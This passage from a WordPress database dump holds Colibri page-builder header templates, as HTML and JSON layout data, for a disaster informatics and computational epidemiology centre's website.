</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','publish','closed','closed','','22','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_header&p=22',0,'extb_post_header','',0),(23,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":865,\"type\":\"header\",\"props\":{\"text\":\"learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/?page_id=126\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":864,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h29\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h33\",\"parentId\":\"22-h32\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h34\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','publish','closed','closed','','23','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=23',0,'extb_post_json','',0),(25,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n <!---->\n <!---->\n <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n <g opacity=\"0.33\">\n <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n </g>\n <g opacity=\"0.66\">\n <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n </g>\n <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n transform=\"translate(0 0)\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n <!---->\n <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <!---->\n </div>\n </div>\n </div>\n </div>\n</div>','header_post','','publish','closed','closed','','25','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_header&p=25',0,'extb_post_header','',0),(26,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"v